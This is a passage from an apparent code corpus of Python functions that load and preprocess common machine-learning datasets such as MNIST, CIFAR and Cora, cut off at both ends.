dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes", "def load_data():\n\n training_files_dir = \"digits/trainingDigits\"\n training_files = os.listdir(training_files_dir)\n file_num = len(training_files)\n hw_labels = []\n\n training_mat = zeros((file_num, 32 * 32))\n for i in xrange(file_num):\n filename = training_files[i]\n file_label = int((filename.split(\".\")[0]).split(\"_\")[0])\n hw_labels.append(file_label)\n training_mat[i, :] = img2vector(training_files_dir + '/' + filename)\n\n return training_mat, hw_labels", "def load_data():\n global batch_size, num_batches\n # import data\n data, labels = original_clean()\n test_data = data[:test_size, :]\n test_labels = labels[:test_size]\n\n data = data[test_size:, :]\n\n # make landmarks with points with most neighbors\n N = NearestNeighbors(n_neighbors=k_start).fit(data).kneighbors_graph(data).todense()\n N = np.array(N)\n num_connections = N.sum(axis=0).argsort()[::-1] # see how many neighbors each point has\n top_landmarks_idxs = num_connections[:num_lm] # sort in descending order\n land_marks = data[top_landmarks_idxs, :] # pick the top ones\n data = np.delete(data, top_landmarks_idxs, axis=0) # delete the landmarks\n # find the nearest landmarks for the landmarks\n landmark_neighbors = NearestNeighbors(n_neighbors=k_lm).fit(land_marks).kneighbors_graph(land_marks).todense()\n # break data into batches, create 
empty holders\n batch_loader = np.zeros((num_batches, batch_size + num_lm, n))\n batch_graph = np.zeros((num_batches, batch_size + num_lm, batch_size + num_lm))\n # create the full neighborhood graph for each batch\n for i in range(num_batches):\n holder = data[batch_size * i: batch_size * (i + 1)]\n # find the nearest landmarks for the rest of the points\n holder_graph = NearestNeighbors(n_neighbors=k_other).fit(land_marks).kneighbors_graph(holder).todense()\n for j in range(batch_size): # copy over the holder graph\n for l in range(num_lm):\n if holder_graph[j, l] == 1:\n batch_graph[i, j, l + batch_size] = 1\n batch_graph[i, l + batch_size, j] = 1\n for j in range(num_lm): # copy over landmark neighbors\n for l in range(j, num_lm):\n if landmark_neighbors[j, l] == 1 and j != l:\n batch_graph[i, j + batch_size, l + batch_size] = 1\n batch_graph[i, l + batch_size, j + batch_size] = 1\n holder = np.concatenate((holder, land_marks))\n batch_loader[i] = holder\n batch_size += num_lm # adjust the batch size\n return batch_loader, data, batch_graph, landmark_neighbors, test_data, test_labels, land_marks", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb')as f:\r\n datadict = p.load(f)\r\n \r\n X = datadict['data']\r\n Y = datadict['labels']\r\n \r\n print X.shape\r\n X = X.reshape(X.shape[0], SHAPE[0], SHAPE[1], SHAPE[2])\r\n Y = np.array(Y)\r\n return X, Y", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n n_nodes, d_edge = features.shape\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n print(edges_unordered)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n node_features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n # Edge matrix\n edge_features = None\n is3d = False\n if(is3d):\n indices = [[], [] , []]\n values = []\n sizes = [n_nodes, n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n else:\n indices = [[], []]\n values = []\n sizes = [n_nodes*n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n 
indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n node_features = torch.FloatTensor(np.array(node_features.todense()))\n\n labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, edge_features, node_features, labels, idx_train, idx_val, idx_test", "def readDataFromFile():\n image_size = 28 # each image is 28x28\n\n num_images = 60000 # there are 60k images\n with gzip.open(r'train-images-idx3-ubyte.gz', 'r') as f: # 60k train & valid\n f.read(16) # reading by 16-byte double\n buffer_Train_Images = f.read(image_size * image_size * num_images)\n f.close()\n data_Train_Images = np.frombuffer(buffer_Train_Images, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n data_Train_Images = data_Train_Images.reshape(num_images,\n image_size * image_size) # Data = 60k x 28 x 28 with 1 value in it\n\n with gzip.open('train-labels-idx1-ubyte.gz', 'r') as f: # 60k train & valid - labels\n f.read(8) # reading by 16-byte double\n buffer_Train_Labels = f.read(num_images)\n data_Train_Labels = np.frombuffer(buffer_Train_Labels, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n\n num_images = 10000 # there are 10k images\n with gzip.open('t10k-images-idx3-ubyte.gz', 'r') as f: # 10k tests\n f.read(16) # reading by 16-byte double\n buffer_Test_Image = f.read(image_size * image_size * num_images)\n data_Test_Image = np.frombuffer(buffer_Test_Image, dtype=np.uint8).astype(\n np.uint8) # translating into 0 to 255\n data_Test_Image = data_Test_Image.reshape(num_images, image_size * image_size) # Data = 60k x 28 x 28 with\n\n with gzip.open('t10k-labels-idx1-ubyte.gz', 'r') as f: # 10k tests - lbles\n f.read(8) # reading by 16-byte double\n buffer_Test_Label = f.read(num_images)\n data_Test_Labels = np.frombuffer(buffer_Test_Label, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n\n return data_Train_Images, data_Train_Labels, data_Test_Image, data_Test_Labels", "def load_data(self) -> tuple:\n self.read_path = Path(os.environ[\"DATA_PATH\"]) / \"characters\"\n self.pretrain_path = Path(os.environ[\"FONT_DATA\"]) / \"training\"\n self.dataset_builder.build_data_set()\n X_pretrain, y_pretrain, X_train, y_train, X_dev, y_dev, X_test, y_test = tuple(\n [] for l in range(8)\n )\n\n for letter in self.hebrew.letter_li:\n pretrain_images = glob(f\"{Path(self.pretrain_path/letter)}/*.jpeg\")\n train_images = glob(f'{Path(self.read_path/\"train\"/letter)}/*.jpg')\n dev_images = glob(f'{Path(self.read_path/\"dev\"/letter)}/*.jpg')\n test_images = glob(f'{Path(self.read_path/\"test\"/letter)}/*.jpg')\n\n # pretrain data\n for img in pretrain_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_pretrain.append(image)\n y_pretrain.append(self.hebrew.letter_li.index(letter))\n\n # training data\n for img in train_images:\n image = 
cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_train.append(image)\n y_train.append(self.hebrew.letter_li.index(letter))\n\n # dev data\n for img in dev_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_dev.append(image)\n y_dev.append(self.hebrew.letter_li.index(letter))\n\n # test data\n for img in test_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_test.append(image)\n y_test.append(self.hebrew.letter_li.index(letter))\n\n return (\n np.array(X_pretrain),\n np.array(y_pretrain),\n np.array(X_train),\n np.array(y_train),\n np.array(X_dev),\n np.array(y_dev),\n np.array(X_test),\n np.array(y_test),\n )", "def load_theano_dataset(data_dir):\n\n import numpy as np\n import nibabel\n from sklearn.datasets.base import Bunch\n\n data_dir = data_dir\n\n # create sklearn's Bunch of data\n dataset_files = Bunch(\n func=data_dir+'bold.nii.gz',\n session_target=data_dir+'attributes.txt',\n mask=data_dir+'mask.nii.gz',\n conditions_target=data_dir+'attributes_literal.txt'\n )\n\n # fmri_data and mask are copied to break reference to the original object\n bold_img = nibabel.load(dataset_files.func)\n fmri_data = bold_img.get_data().astype(float)\n affine = bold_img.get_affine()\n y, session = np.loadtxt(dataset_files.session_target).astype(\"int\").T\n conditions = np.recfromtxt(dataset_files.conditions_target)['f0']\n mask = dataset_files.mask\n\n # ### Restrict to specified conditions\n condition_mask = np.logical_or(\n np.logical_or(\n conditions == 'ExeCtrl_5', conditions == 'ExeCtrl_0'\n ), conditions == 'Rest'\n )\n X = fmri_data[..., condition_mask]\n y = y[condition_mask]\n\n from sklearn.preprocessing import binarize\n y = binarize(y, threshold=2.0)[0]\n\n # ### Masking step\n from pymri.utils import masking\n from nibabel import Nifti1Image\n\n # Mask data\n X_img = Nifti1Image(X, affine)\n X = masking.apply_mask(X_img, mask, smoothing_fwhm=4)\n\n from sklearn.feature_selection import SelectKBest, f_classif\n\n # ### Define the dimension reduction to be used.\n # Here we use a classical univariate feature selection based on F-test,\n # namely Anova. 
We set the number of features to be selected to 784\n feature_selection = SelectKBest(f_classif, k=784)\n\n feature_selection.fit(X, y)\n X = feature_selection.transform(X)\n print(X.shape)\n\n # ### Splitting ###########################################################\n from sklearn.cross_validation import train_test_split\n\n # split original dataset into training phase (dataset) and validation phase\n X, X_v, y, y_v = train_test_split(\n X, y, test_size=0.5, random_state=42\n )\n\n # split validation phase into validation dataset and test dataset\n X_v, X_t, y_v, y_t = train_test_split(\n X_v, y_v, test_size=0.25, random_state=42\n )\n\n # X, y - training dataset\n # X_v, y_v - validation dataset\n # X_t, y_t - test dataset\n\n return (X, y), (X_v, y_v), (X_t, y_t)", "def load_data_and_embedding():\n\n # Load data\n df_data = pd.read_csv('../new_data/train_ids_and_labels_1400.txt',nrows=10000)\n y = df_data['class'] - 1 # class (0 ~ 18)\n X = df_data.drop(['class'], axis=1).values\n\n # Transform to binary class matrix\n y = to_categorical(y.values)\n\n # Randomly shuffle data\n np.random.seed(10)\n\n shuffle_indices = np.random.permutation(range(len(y)))\n X_shuffled = X[shuffle_indices]\n y_shuffled = y[shuffle_indices]\n\n # Split to train/test set\n # TODO: This is very crude, should use cross validation\n val_sample_index = -1 * int(0.2 * len(y))\n X_train, X_val = X_shuffled[:val_sample_index], X_shuffled[val_sample_index:]\n y_train, y_val = y_shuffled[:val_sample_index], y_shuffled[val_sample_index:]\n\n del df_data, X, y, X_shuffled, y_shuffled\n\n embedding_matrix = np.load(\"../embedding/word-embedding-200d-mc5.npy\")\n\n return X_train, y_train, X_val, y_val,embedding_matrix", "def load_data(filename):\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Seperate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = load_pickle(f)\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000,3072)\n Y = np.array(Y)\n return X, Y", "def loadTestData():\n path = raw_input(\"Enter the path of Test Data: \")\n data = np.genfromtxt(path, delimiter=',', dtype=int)\n\n labels = data[:, -1]\n\n unwantedLabels = [4, 5, 6, 7, 8, 9]\n listToDelete = []\n for i, line in enumerate(range(len(data))):\n if labels[i] in unwantedLabels:\n listToDelete.append(i)\n\n actualData = np.delete(data, listToDelete, axis=0)\n\n # print(actualData.shape)\n # Separating the labels and data into different arrays\n actualLabels = actualData[:, -1]\n actualData 
= actualData[:, :-1]\n\n actualData = pre.scale(actualData)\n\n # Change the label vector to label matrix\n # If Label is 2 then it becomes [0, 1, 0]\n labelMatrix = np.zeros((actualLabels.shape[0], 4))\n for j in range(len(actualLabels)):\n if actualLabels[j] == 0:\n labelMatrix[j][0] = 1\n if actualLabels[j] == 1:\n labelMatrix[j][1] = 1\n if actualLabels[j] == 2:\n labelMatrix[j][2] = 1\n if actualLabels[j] == 3:\n labelMatrix[j][3] = 1\n\n return actualData, actualLabels", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb') as f:\r\n datadict = load_pickle(f)\r\n X = datadict['data']\r\n Y = datadict['labels']\r\n X = X.reshape(10000,3072)\r\n Y = np.array(Y)\r\n return X, Y", "def load_dataset():\n temp = gzip.open('mnist.pkl.gz')\n train, val , test = pickle.load(temp,encoding='latin1')\n temp.close()\n train_inp = [np.reshape(x, (784,1)) for x in train[0]]\n train_outp = [one_hot(y) for y in train[1]]\n training_data = zip(train_inp, train_outp)\n validation_inp = [np.reshape(x, (784, 1)) for x in val[0]]\n validation_data = zip(validation_inp, val[1])\n test_inp = [np.reshape(x, (784, 1)) for x in test[0]]\n test_data = zip(test_inp, test[1])\n return (training_data,validation_data,test_data)", "def load_data(self, training_path : str =\"data/training/mapping\"):\n\n array_badly_mapped = np.load(join(training_path, \"array_badly_mapped.npy\"))\n array_SV = np.load(join(training_path, \"array_SV.npy\"))\n\n labels_SV = np.zeros(len(array_SV))\n labels_badly_mapped= np.ones(len(array_badly_mapped))\n\n features = np.concatenate((array_SV, array_badly_mapped)).reshape((-1, 2))\n labels = np.concatenate((labels_SV, labels_badly_mapped))\n\n self.X_train, self.X_valid, self.y_train, self.y_valid = train_test_split(\n features, labels\n )", "def DataLoader(data_place):\n # Nd = []\n # Np = []\n # Nz = []\n # channel_num = []\n # images = []\n # id_labels = []\n # pose_labels = []\n\n # mycase\n # Nz = 50\n # channel_num = 3\n # images = np.load('{}/images.npy'.format(data_place))\n # id_labels = np.load('{}/ids.npy'.format(data_place))\n # pose_labels = np.load('{}/yaws.npy'.format(data_place))\n #\n # Np = int(pose_labels.max() + 1)\n # Nd = int(id_labels.max() + 1)\n #\n # return [images, id_labels, pose_labels, Nd, Np, Nz, channel_num]\n\n # mycase MultiPIE\n Nz = 50\n channel_num = 3\n image_attributes_df = pd.read_csv(data_place)\n\n Nd = int(np.max(image_attributes_df['Id'])+1)\n Np = int(np.max(image_attributes_df['pose'])+1)\n Ni = int(np.max(image_attributes_df['illum'])+1)\n\n return [image_attributes_df, Nd, Np, Ni, Nz, channel_num]", "def load_caps(batch_size = 128):\r\n def relabel_classes(class_idx):\r\n if 10 <= class_idx <= 35:\r\n return class_idx - 10\r\n return None\r\n\r\n\r\n\r\n train_ds = torchvision.datasets.EMNIST(root='./data',\r\n train=True,\r\n download=True,\r\n split = 'byclass',\r\n transform = emnist_img_transform,\r\n target_transform = relabel_classes)\r\n\r\n\r\n\r\n test_ds = torchvision.datasets.EMNIST(root='./data',\r\n train=False,\r\n download=True,\r\n split = 'byclass',\r\n transform = emnist_img_transform,\r\n target_transform = relabel_classes)\r\n\r\n # Discard unwanted characters from the background data\r\n train_ds = discard_none_targets(train_ds)\r\n test_ds = discard_none_targets(test_ds)\r\n\r\n\r\n # create data loaders and shuffle everything...\r\n train_dl = torch.utils.data.DataLoader(train_ds,\r\n batch_size=batch_size,\r\n shuffle=True)\r\n\r\n test_dl = torch.utils.data.DataLoader(test_ds,\r\n 
batch_size=batch_size,\r\n shuffle=True)\r\n\r\n return train_dl,test_dl", "def load_data():\n data = gzip.open(\"mnist.pkl.gz\", \"rb\")\n train_set, valid_set, test_set = cPickle.load(data)\n data.close()\n\n # Combine validation and train folds to recreate the master 60k set.\n new_images = numpy.concatenate((train_set[0], valid_set[0]))\n new_labels = numpy.concatenate((train_set[1], valid_set[1]))\n\n train_set = (new_images, new_labels)\n \n return (train_set, test_set)", "def load_data_realistic_ssl(dataset_name, data_path, label_map_path):\n logging.info('Loading data from pickle at %s.', data_path)\n train_set, validation_set, test_set = pickle.load(open(data_path, 'rb'))\n train_inputs = train_set['images']\n train_labels = train_set['labels']\n val_inputs = validation_set['images']\n val_labels = validation_set['labels']\n test_inputs = test_set['images']\n test_labels = test_set['labels']\n # Load label map that specifies which trainining labeles are available.\n train_indices = json.load(open(label_map_path, 'r'))\n train_indices = [\n int(key.encode('ascii', 'ignore')) for key in train_indices['values']\n ]\n train_indices = np.asarray(train_indices)\n\n # Select the loaded train indices, and make the rest unlabeled.\n unlabeled_mask = np.ones((train_inputs.shape[0],), dtype=np.bool)\n unlabeled_mask[train_indices] = False\n unlabeled_inputs = train_inputs[unlabeled_mask]\n unlabeled_labels = train_labels[unlabeled_mask]\n train_inputs = train_inputs[train_indices]\n train_labels = train_labels[train_indices]\n\n # Select a feature preprocessing function, depending on the dataset.\n feature_preproc_fn = ((lambda image: image)\n if dataset_name == 'cifar10' else convert_image)\n\n data = Dataset.build_from_splits(\n name=dataset_name,\n inputs_train=train_inputs,\n labels_train=train_labels,\n inputs_val=val_inputs,\n labels_val=val_labels,\n inputs_test=test_inputs,\n labels_test=test_labels,\n inputs_unlabeled=unlabeled_inputs,\n labels_unlabeled=unlabeled_labels,\n feature_preproc_fn=feature_preproc_fn)\n return data", "def load_data(path, rng, epoch, batch_size, x_,y_):\n #global x_,t_,y_,\n #global first_report2 \n #first_report2 = True\n start_time = time()\n v,p,skeleton_feature,l = load_gzip(path)\n v = v[:,:,:res_shape[2]]\n res_shape[0] = v.shape[0]\n v_new = empty(res_shape,dtype=\"uint8\")\n\n for i in xrange(v.shape[0]): #batch\n if p[i] < 10: p[i] = 100\n ofs = p[i]*ratio\n mid = v.shape[-1]/2.\n sli = None\n if ofs < mid:\n start = int(round(mid-ofs))\n end = int(round(mid+ofs))\n sli = slice(start,end)\n\n for j in xrange(v.shape[2]): #maps\n for k in xrange(v.shape[3]): #frames\n #body\n img = v[i,0,j,k]\n img = cut_img(img,5)\n img = misc.imresize(img,(h,h))\n # if j==0: img = 255-misc.imfilter(img,\"contour\")\n v_new[i,0,j,k] = img\n\n #hand\n img = v[i,1,j,k]\n img = img[sli,sli]\n img = misc.imresize(img,(h,h))\n v_new[i,1,j,k] = img\n\n vid, lbl = v_new,l\n\n #if epoch==0: print \"get in\",str(time()-start_time)[:3]+\"s\",\n # shuffle data\n ind = rng.permutation(l.shape[0])\n ind = ind[:batch_size]\n vid = vid[:,:,:,:4,:,:]\n vid, skeleton_feature, lbl = vid[ind].astype(floatX), skeleton_feature[ind].astype(floatX),lbl[ind].astype(floatX)\n #vid, skeleton_feature, lbl = vid.astype(floatX), skeleton_feature.astype(floatX),lbl.astype(floatX)\n\n # vid = vid/(255./(scaler*2.))-scaler\n #traj = traj/(255./(scaler_traj*2.))-scaler_traj\n # traj = traj/(255./5.)\n\n # Wudi already made labels start from 0\n #lbl -= 1 \n\n #if first_report2:\n # print \"data 
range:\",vid.min(),vid.max()\n # print \"traj range:\",skeleton_feature.min(),skeleton_feature.max()\n # print \"lbl range:\",lbl.min(),lbl.max()\n # first_report2 = False\n\n # set value\n x_.set_value(vid, borrow=True)\n #t_.set_value(skeleton_feature, borrow=True)\n y_.set_value(lbl, borrow=True)", "def _load_data(self):\n\n path_data_x = '/workspace/base-ml/data/dizzyreg/t%s_df.csv' % \\\n self.task_num\n path_data_y = '/workspace/base-ml/data/dizzyreg/label_df_t%s.csv' % self.task_num\n path_meta = '/workspace/base-ml/data/dizzyreg/meta_df_t%s.csv' % self.task_num\n path_numerical_columns = '/workspace/base-ml/data/dizzyreg/num_columns_v2.csv'\n path_nonnumerical_columns = '/workspace/base-ml/data/dizzyreg/non_num_columns_v2.csv'\n\n read_data_x = pd.read_csv(path_data_x)\n read_data_y = pd.read_csv(path_data_y)\n read_data_meta = pd.read_csv(path_meta)\n\n # Drop columns if it only contains 1 unique element\n read_data_x = pd.DataFrame(self.drop_one_elem_columns(read_data_x))\n\n num_col = pd.read_csv(path_numerical_columns)\n num_col = read_data_x.columns.isin(num_col['0'].values).nonzero()[0]\n col_idx = np.arange(read_data_x.shape[-1])\n non_num_col = np.setdiff1d(col_idx, num_col)\n\n # new_data_x = np.array(read_data_x).astype(np.float32)\n new_data_x = np.array(read_data_x)\n new_data_y = np.array(read_data_y).astype(np.float32)\n new_data_meta = np.array(read_data_meta).astype(np.float32)\n\n print(new_data_x.shape, new_data_y.shape, new_data_meta.shape)\n\n\n # Winsorize dataset\n len_feat = new_data_x.shape[-1]\n idx_list = list(num_col)\n for i in range(len_feat):\n if i in idx_list:\n cur_data = new_data_x[:, i]\n cur_data = np.array(cur_data)\n lower_p = np.percentile(cur_data, 5)\n higher_p = np.percentile(cur_data, 95)\n cur_data[cur_data < lower_p] = lower_p\n cur_data[cur_data > higher_p] = higher_p\n new_data_x[:, i] = cur_data\n\n # Make sure target data is one-hot encoded\n if new_data_y.shape[-1] == 1:\n num_class = len(np.unique(new_data_y))\n new_data_y = np.eye(num_class)[new_data_y.astype(int).reshape(-1)]\n new_data_y = new_data_y.astype('float32')\n self.orig_column_names = read_data_x.columns\n self.data_x = new_data_x # N x F\n self.data_y = new_data_y # N x C\n self.numerical_idx = num_col # list of idx\n self.non_num_idx = non_num_col # None\n\n # Calculate adjacency matrix\n self.meta_inf = new_data_meta.astype('float32') # N x 3\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def load_data(train_size=30000, random_state=0):\n print(\"Loading adult data from alibi.\")\n np.random.seed(random_state)\n\n data = alibi.datasets.fetch_adult()\n\n # mix input data\n data_perm = np.random.permutation(np.c_[data.data, data.target])\n data.data = data_perm[:, :-1]\n data.target = data_perm[:, -1]\n\n # perform train / test split\n X_train, y_train = data.data[:train_size, :], data.target[:train_size]\n X_test, y_test = data.data[train_size:, :], data.target[train_size:]\n\n return data, X_train, y_train, X_test, y_test", "def load_data(seq_length, filename, maxlen):\n data, chars, vocab_size = get_data(filename=filename, maxlen=maxlen)\n # chars is ints: ord('a') is chr(97)\n print('Data length: {} characters'.format(len(data)))\n print('Vocabulary size: {} characters'.format(vocab_size))\n\n ix_to_char = {ix: char for ix, char in enumerate(chars)}\n char_to_ix = {char: ix for ix, char in enumerate(chars)}\n xfile = os.path.join(mydir, 'X_{}_{}.bcolz'.format(seq_length, maxlen))\n yfile = os.path.join(mydir, 'y_{}_{}.bcolz'.format(seq_length, 
maxlen))\n if os.path.exists(xfile):\n X = bcolz.carray(rootdir=xfile, mode='r')[:]\n y = bcolz.carray(rootdir=yfile, mode='r')[:]\n print('using cached values from {}. X.shape={}, y.shape={}'.format(xfile, X.shape, y.shape))\n return X, y, vocab_size, ix_to_char\n else:\n print('no file {}'.format(xfile))\n # 6 s\n print('mapping data of len {}'.format(len(data)))\n data_mapped = np.array(list(map(char_to_ix.get, data)))\n\n nnn = int(len(data_mapped) / seq_length)\n print('nnn = {}'.format(nnn))\n\n X = np.zeros((nnn, seq_length, vocab_size), dtype=np.int16)\n y = np.zeros((nnn, seq_length, vocab_size), dtype=np.int16)\n I = np.eye(vocab_size, dtype=np.int16)\n t0 = time.time()\n for i in range(0, nnn):\n if i % 1000 == 1:\n percent_done = i / float(nnn)\n eta = (1 - percent_done) * (time.time() - t0) / percent_done / 60\n print('iteration {}: {} done. ETA {} minutes'.format(i, percent_done, eta))\n X[i] = I[data_mapped[i * seq_length:(i+1) * seq_length]]\n y[i] = I[data_mapped[i * seq_length + 1:(i+1) * seq_length + 1]]\n\n print('saving bcolz')\n bcolz.carray(X, rootdir=xfile)\n bcolz.carray(y, rootdir=yfile)\n return X, y, vocab_size, ix_to_char", "def load_letter(folder, min_num_images):\n image_files = os.listdir(folder) #返回指定的文件夹包含的文件或文件夹的名字的列表\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size),dtype=np.float32) #创建一个numpy矩阵,个数为files的个数,长度为28*28,数据类型为float32\n print(folder)\n num_images = 0\n for image in image_files:\n image_file = os.path.join(folder, image) #将多个路径组合后返回,返回的是图片的路径和名字\n try:\n image_data = (imageio.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth #读取(image_file-image像素/2)/image像素作为image_data\n if image_data.shape != (image_size, image_size):\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\n dataset[num_images, :, :] = image_data #dataset中第num_images图片赋值为image_data的数据\n num_images = num_images + 1\n except (IOError, ValueError) as e:\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\n\n dataset = dataset[0:num_images, :, :] #将dataset的数据合并\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (num_images, min_num_images))\n\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset)) #矩阵均值\n print('Standard deviation:', np.std(dataset)) #矩阵标准差\n return dataset #返回数据集", "def load_cifar10_data(self, data_path='data/cifar-10-batches-py',\n n_train_samples=50000, n_test_samples=10000):\n train_data = None\n train_labels = []\n\n for i in range(1, 6):\n data_dic = unpickle(data_path + '/data_batch_{}'.format(i))\n if i == 1:\n train_data = data_dic['data']\n else:\n train_data = np.vstack((train_data, data_dic['data']))\n\n train_labels += data_dic['labels']\n\n test_data_dic = unpickle(data_path + '/test_batch')\n test_data = test_data_dic['data']\n test_labels = test_data_dic['labels']\n\n train_data = train_data.reshape((len(train_data),\n self.LOADED_IMG_DEPTH,\n self.LOADED_IMG_HEIGHT,\n self.LOADED_IMG_HEIGHT))\n\n train_data = np.rollaxis(train_data, 1, 4)\n train_labels = np.array(train_labels)\n\n test_data = test_data.reshape((len(test_data),\n self.LOADED_IMG_DEPTH,\n self.LOADED_IMG_HEIGHT,\n self.LOADED_IMG_HEIGHT))\n\n test_data = np.rollaxis(test_data, 1, 4)\n test_labels = np.array(test_labels)\n\n self.train_dataset = {'data': train_data[0:n_train_samples],\n 'labels': train_labels[0:n_train_samples],\n 'cls': [np.zeros(10)\n for i in range(n_train_samples)]}\n\n for i in range(0, n_train_samples):\n 
self.train_dataset['cls'][i][self.train_dataset['labels'][i]] = 1.\n\n self.test_dataset = {'data': test_data[0:n_test_samples],\n 'labels': test_labels[0:n_test_samples],\n 'cls': [np.zeros(10)\n for i in range(n_train_samples)]}\n\n for i in range(0, n_test_samples):\n self.test_dataset['cls'][i][self.test_dataset['labels'][i]] = 1.\n\n self.train_dataset['data_array'] = np.array(\n [item.flatten() for item in self.train_dataset['data']])\n\n self.train_dataset['labels_array'] = np.array(\n [item.flatten() for item in self.train_dataset['labels']])\n\n self.train_dataset['cls_array'] = np.array(\n [item.flatten() for item in self.train_dataset['cls']])\n\n self.test_dataset['data_array'] = np.array(\n [item.flatten() for item in self.test_dataset['data']])\n\n self.test_dataset['labels_array'] = np.array(\n [item.flatten() for item in self.test_dataset['labels']])\n\n self.test_dataset['cls_array'] = np.array(\n [item.flatten() for item in self.test_dataset['cls']])\n\n return None", "def _load_data(self, imagepath):\n im = cv2.imread(imagepath)\n self.net.blobs['data'].data[...] = self.transformer.preprocess('data', im)", "def load_data():\n\n \"\"\"The ``training_data`` is returned as a tuple with two entries.\n The first entry contains the actual training images. This is a\n numpy ndarray with 50,000 entries. Each entry is, in turn, a\n numpy ndarray with 784 values, representing the 28 * 28 = 784\n pixels in a single MNIST image.\"\"\"\n\n \"\"\"The second entry in the ``training_data`` tuple is a numpy ndarray\n containing 50,000 entries. Those entries are just the digit\n values (0...9) for the corresponding images contained in the first\n entry of the tuple.\"\"\"\n\n \"\"\"The ``validation_data`` and ``test_data`` are similar, except\n each contains only 10,000 images.\"\"\"\n f = gzip.open('MNIST/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = Pickle.load(f, encoding='bytes'\n )\n f.close()\n return (training_data, validation_data, test_data)", "def LoadBatch(filename):", "def load_cifar100_dataset(dirname, labels='fine', transpose_permutation=(0,2,3,1)):\n \n #Verify paths exists for training and testing set\n if not os.path.exists(dirname):\n raise IOError, \"Cannot find path %s\" % dirname\n \n if labels not in ['fine', 'coarse']:\n raise AttributeError, \"Labels argument must be set to 'coarse' or 'fine'\"\n \n if len(set(transpose_permutation)) != 4:\n raise AttributeError, \"Expect transpose permutation to be \"\n\n full_path = os.path.abspath(dirname)\n \n train_path = os.path.join(full_path, 'train')\n test_path = os.path.join(full_path, 'test')\n \n #Load the training set\n with open(train_path, 'rb') as tr_f:\n tr_data_raw = pickle.load(tr_f)\n tr_data = {}\n \n for key, val in tr_data_raw.items():\n tr_data[key.decode('utf8')] = val #32 x 32 x 3 